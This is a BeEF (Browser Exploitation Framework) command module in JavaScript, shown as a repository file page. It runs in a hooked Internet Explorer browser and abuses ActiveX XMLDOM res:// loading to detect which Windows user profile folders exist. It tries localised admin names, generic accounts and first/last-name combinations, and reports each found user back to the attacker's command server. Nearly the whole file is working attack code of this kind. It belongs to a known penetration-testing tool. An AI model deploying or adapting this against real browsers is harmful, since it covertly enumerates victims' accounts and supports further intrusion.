CoCalc -- command.js

GitHub Repository: beefproject/beef
Path: blob/master/modules/host/detect_users/command.js
¹¹⁵⁴ views
1
//
2
// Copyright (c) 2006-2025Wade Alcorn - [email protected]
3
// Browser Exploitation Framework (BeEF) - https://beefproject.com
4
// See the file 'doc/COPYING' for copying permission
5
//
6

7
beef.execute(function() {
8

9
  if (!("ActiveXObject" in window)) {
10
    beef.debug('[Detect Users] Unspported browser');
11
    beef.net.send('<%= @command_url %>', <%= @command_id %>,'fail=unsupported browser', beef.are.status_error());
12
    return false;
13
  }
14

15
  function detect_folder(path) {
16
    var dtd = 'res://' + path;
17
    var xml = '<?xml version="1.0" ?><!DOCTYPE anything SYSTEM "' + dtd + '">';
18
    var xmlDoc = new ActiveXObject("Microsoft.XMLDOM");
19
    xmlDoc.async = true;
20
    try {
21
      xmlDoc.loadXML(xml);
22
      return false;
23
    } catch (e) {
24
      return true;
25
    }
26
  }
27

28
  // Detect home directory
29
  beef.debug('[Detect Users] Checking for home directory');
30
  var home_dirs = ["C:\\Documents and Settings\\", "C:\\Users\\"];
31
  var default_users = ['Default', 'Default User', 'All Users'];
32
  var home_dir = '';
33
  for (var i = 0; i < home_dirs.length; i++) {
34
    for (var j = 0; j < default_users.length; j++) {
35
      var result = detect_folder(home_dirs[i] + default_users[j]);
36
      if (result) {
37
        beef.debug('[Detect Users] Found home directory: ' + home_dirs[i]);
38
        home_dir = home_dirs[i];
39
        break;
40
      }
41
    }
42
  }
43

44
  if (home_dir == '') {
45
    beef.debug('[Detect Users] Could not find home directory');
46
    beef.net.send('<%= @command_url %>', <%= @command_id %>,'fail=could not find home directory', beef.are.status_error());
47
    return false;
48
  }
49

50
  // Enumerate common usernames
51
  var users = [
52
    // Localised administrator accounts
53
    'Administrator', 'Järjestelmänvalvoja', 'Administrateur',
54
    'Rendszergazda', 'Administrador', 'Администратор', 'Administrador',
55
    'Administratör',
56
    // Common administrator accounts
57
    'adm', 'admin', 'localadmin', 'root',
58
    // Common usernames
59
    '1234', '12345', '123456', 'helpdesk', 'support', 'user',
60
    'guest', 'public', 'demo', 'test', 'temp', 'www', 'svc'];
61
  for (var i = 0; i < users.length; i++) {
62
    var user = users[i];
63
    beef.debug('[Detect Users] Checking for user: ' + user);
64
    var result = detect_folder(home_dir + user);
65
    if (result) {
66
      beef.debug('[Detect Users] Found user: ' + user);
67
      beef.net.send('<%= @command_url %>', <%= @command_id %>,'result=Found user: ' + user, beef.are.status_success());
68
    }
69
  }
70

71
  // Common first name / last name combinations
72
  // Source: https://techcrunch.com/2009/06/23/ever-wondered-what-the-most-common-names-on-facebook-are-heres-a-list/
73
  var first_names = ['John', 'David', 'Michael', 'Chris', 'Mike',
74
    'Mark', 'Paul', 'Daniel', 'James', 'Maria'];
75
  var last_names = ['Smith', 'Jones', 'Johnson', 'Lee', 'Brown',
76
    'Williams', 'Rodriguez', 'Garcia', 'Gonzalez', 'Lopez'];
77

78
  // All first names
79
  // Format: <FIRST>
80
  for (var i = 0; i < first_names.length; i++) {
81
    var user = first_names[i];
82
    beef.debug('[Detect Users] Checking for user: ' + user);
83
    var result = detect_folder(home_dir + user);
84
    if (result) {
85
      beef.debug('[Detect Users] Found user: ' + user);
86
      beef.net.send('<%= @command_url %>', <%= @command_id %>,'result=Found user: ' + user, beef.are.status_success());
87
    }
88
  }
89

90
  // All first names with all last names
91
  // Format: <FIRST><LAST>
92
  for (var i = 0; i < first_names.length; i++) {
93
    for (var j = 0; j < first_names.length; j++) {
94
      var user = first_names[i] + last_names[j];
95
      beef.debug('[Detect Users] Checking for user: ' + user);
96
      var result = detect_folder(home_dir + user);
97
      if (result) {
98
        beef.debug('[Detect Users] Found user: ' + user);
99
        beef.net.send('<%= @command_url %>', <%= @command_id %>,'result=Found user: ' + user, beef.are.status_success());
100
      }
101
    }
102
  }
103

104
  // All first names with all last names, joined by '.'
105
  // Format: <FIRST>.<LAST>
106
  for (var i = 0; i < first_names.length; i++) {
107
    for (var j = 0; j < first_names.length; j++) {
108
      var user = first_names[i] + '.' + last_names[j];
109
      beef.debug('[Detect Users] Checking for user: ' + user);
110
      var result = detect_folder(home_dir + user);
111
      if (result) {
112
        beef.debug('[Detect Users] Found user: ' + user);
113
        beef.net.send('<%= @command_url %>', <%= @command_id %>,'result=Found user: ' + user, beef.are.status_success());
114
      }
115
    }
116
  }
117

118
  // First initial + last name
119
  // Format: <A-Z><LAST>
120
  for (var i = 0; i < last_names.length; i++) {
121
    for (var j = 65; j <= 90; j++) {
122
    var user = String.fromCharCode(j) + last_names[i];
123
      beef.debug('[Detect Users] Checking for user: ' + user);
124
      var result = detect_folder(home_dir + user);
125
      if (result) {
126
        beef.debug('[Detect Users] Found user: ' + user);
127
        beef.net.send('<%= @command_url %>', <%= @command_id %>,'result=Found user: ' + user, beef.are.status_success());
128
      }
129
    }
130
  }
131

132
  // Last name + first initial
133
  // Format: <LAST><A-Z>
134
  for (var i = 0; i < last_names.length; i++) {
135
    for (var j = 65; j <= 90; j++) {
136
    var user = last_names[i] + String.fromCharCode(j);
137
      beef.debug('[Detect Users] Checking for user: ' + user);
138
      var result = detect_folder(home_dir + user);
139
      if (result) {
140
        beef.debug('[Detect Users] Found user: ' + user);
141
        beef.net.send('<%= @command_url %>', <%= @command_id %>,'result=Found user: ' + user, beef.are.status_success());
142
      }
143
    }
144
  }
145

146
});
147

148

149
Product

Resources

Company
